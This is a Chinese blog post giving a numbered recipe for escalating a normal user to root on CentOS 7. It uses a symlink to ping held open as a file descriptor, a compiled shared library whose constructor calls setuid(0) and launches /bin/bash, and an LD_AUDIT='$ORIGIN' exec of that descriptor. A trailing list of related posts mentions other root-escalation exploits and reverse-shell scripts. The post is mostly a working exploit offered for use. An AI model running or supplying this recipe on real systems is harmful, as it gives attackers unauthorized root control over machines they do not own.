centos7普通用户提权

最新推荐文章于 2024-05-14 15:13:55 发布
最新推荐文章于 2024-05-14 15:13:55 发布
阅读量5k 收藏 8
点赞数 4
分类专栏: 系统漏洞复现 centos 文章标签: centos shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112547747
版权

centos普通用户提权

测试系统版本:centos 7 Linux 3.10.0-1127.8.2.el7.x86_64 x86_64 GNU/Linux

需要先安装 gcc

yum -y install gcc automake autoconf libtool make

开始提权

1.adduser test

2.passwd test

3.mkdir /tmp/exploit

4.ln -s /usr/bin/ping /tmp/exploit/target

5.exec 3< /tmp/exploit/target

6.ls -l /proc/$$/fd/3

7.rm -rf /tmp/exploit

8.ls -l /proc/$$/fd/3

9.vim payload.c

复制以下内容,粘贴至文件中

void __attribute__((constructor)) init() 

{

setuid(0); system("/bin/bash"); 

}

10.gcc -w -fPIC -shared -o /tmp/exploit payload.c

11.ls -l /tmp/exploit

12.LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

13.whoami

在这里插入图片描述

Spaceman-911
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
centos7输入shell找不到命令_安全研究 | CentOS 7系统利用suid获取Root Shell
weixin_42413377的博客
12-08 629
一、操作目的和应用场景本文档介绍在CentOS 7系统中利用带有suid限的程序从而获取root shell的方法。首先简单介绍suid的概念:Linux进程在运行的时候有以下三个UID:Real UID:执行该进程的用户的UID。Real UID只用于标识用户,不用于限检查。Effective UID(EUID):进程执行时生效的UID。在对访问目标进行操作时,系统会检查EUI...
centos7限制普通用户访问单一目录.docx
09-09
CentOS7操作系统中,有时我们需要为特定的用户设置严格的限控制,比如只允许他们访问特定的目录和文件。在给定的场景中,我们希望为开发同事创建一个名为"loglook"的账户,该账户只能查看位于/home/wwwroot/a...
CentOS用户的技术实现summary
kigskylgt的博客
08-29 1062
在传统的Unix限模型中,进程要么是普通用户,要么是超级用户(root),而超级用户具有系统上所有资源的完全控制。"Capability" 是一种更细粒度的限控制方式,它允许进程只获得执行特定操作所需的限,而不需要完整的超级用户限。在 CentOS(一种基于Red Hat Enterprise Linux的Linux发行版)中,用户是指从一个普通用户限升级为超级用户(root)限的过程。:在容器环境中,可能需要容器管理器(如Docker)能够终止容器内的进程,以便进行管理和资源释放。
CentOS6.5——限管理
最新发布
firstgrass的博客
05-14 893
Linux 限是文件执行者面对文件的限,分为是否允许可读 [ -r ],是否允许可写 [ -w ],是否允许可执行 [ -x ];文件的执行者分为 owner(所有者)、group(同组用户)、others(其他用户)。
【CVE-2023-1829】Linux Kernel升漏洞(CVE-2023-1829)centos7解决方案
西原一点红的博客
06-28 2194
如果你需要进行内核模块的开发或构建,你可能需要安装 kernel-lt-headers 和 kernel-lt-devel 包。而如果你只是想安装最新的长期支持内核版本,你可以直接安装 kernel-lt 包。kernel-ml 中的ml是英文【 mainline stable 】的缩写,elrepo-kernel中罗列出来的是最新的稳定主线版本。kernel-lt 中的lt是英文【 long term support 】的缩写,elrepo-kernel中罗列出来的长期支持版本。B. 与当前版本差异小。
【CyberSecurityLearning 66】
_Co1a
04-13 950
目录 升 水平升(也叫越) 垂直升 基于webshell的 windows 系统漏洞 演示:win2003下如何 可能会遇到的问题 演示:win2008下如何 数据库 反弹shell 反弹shell--windows 反弹shell--linux Linux 利用系统漏洞 利用第三方软件 辅助脚本 搜索漏洞库 升 水平升(也叫越) 从同级账户间互相切换身份 比如一个论坛.
centos7普通用户对文件限受限解决方法
qq_52884581的博客
03-09 9636
Centos7中的普通用户与Root用户之间的限关系,以及如何给用户
Centos6普通用户获取最高限方法
weixin_43419816的博客
09-24 2754
Centos6普通用户获取sudo
CentOS 5.5exp
03-20
CentOS 5.5exp
CentOS下命令行实现普通用户和root用户切换的实例
09-15
这篇文章将详细介绍如何在CentOS的命令行环境中进行普通用户与root用户的切换。 首先,让我们了解两个主要的命令,用于在用户之间进行切换: 1. **`su` 命令**: `su` 是 "switch user" 的缩写,用于改变当前登录...
Centos7下安装MongoDB
08-24
Centos7下安装MongoDB Centos7下安装MongoDB是指在Centos7操作系统中安装和配置MongoDB数据库的过程。MongoDB是一个基于分布式文件存储的NoSQL数据库,由C++语言编写,运行稳定,性能高旨在为 WEB 应用供可扩展的...
Linux exp 大全
03-15
linuxexp 集成现在几乎所有的exp 还有反弹shell脚本 pl版的反弹和.C文件的反弹
Centos5-6
08-13
linux,通常的流程是 拿到Webshell -> 传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透 先来从基础的EXP说起来吧
CentOS 7 中完成普通用户向root用户的设置.zip
10-30
为了解决这个问题,CentOS 7供了sudo功能,允许特定的普通用户通过sudo命令临时获取root限,同时保留了系统的安全性和管理灵活性。 首先,我们需要了解sudo的基本概念。sudo是“super user do”的缩写,它允许...
【linux】centos7 普通用户授予 root
热门推荐
阿牛的博客
12-09 1万+
最近通知 linux 期末考试啦!要上机实操并且要求不能使用 root 用户,因此有些操作需要涉及到限问题,我们都知道在命令前加sudo就行了,但sudo的使用也是有前的,一起来看看吧!
CentOS-7 普通用户sudo,获取最高限--漏洞CVE-2019-14287
m0_74313947的博客
02-03 629
这个指令的意思是在tom账户登录的状态下,也就是普通用户而非最高管理员登录状态下,除了root用户其他用户都可以使用下面的id与whoami指令。这个漏洞可能会导致非特用户以root用户的身份执行特命令,进而获得系统的完全控制限。使用用vim编辑器打开/etc/sudoers文件。将uid改成0,一般只有root的uid可以为0。这样就可以在tom下拿到root完全控制限。然后使用切换成tom账户登录。
CentOS 7系统配置sudo策略(附sudo演示)
weixin_41728103的博客
07-23 1589
一、操作目的和应用场景 某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。 二、平台及工具版本 操作系统:CentOS 7 三、操作步骤 (一)运维人员需要执行的命令 初步将运维人员可能需要
linux7.0工具,CentOS 7系统配置sudo策略(附sudo演示)
weixin_42203424的博客
05-08 631
一、操作目的和应用场景某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。二、平台及工具版本...
dirtyCow脏牛内核
orange777
02-23 2722
dirtyCow脏牛内核 这里我靶机用的是centos7,版本信息为 Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 下载poc wget https://github.com/FireFart/dirtycow/archive/master.zip 解压 unzip master.zip 编译 gcc -pthre
centos7创建普通用户
11-29
CentOS 7中创建普通用户的步骤如下: 1.以root用户身份登录系统。 2.使用以下命令创建新用户,其中“username”是你想要创建的用户名: ``` useradd username ``` 3.设置新用户的密码: ``` passwd username ``...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值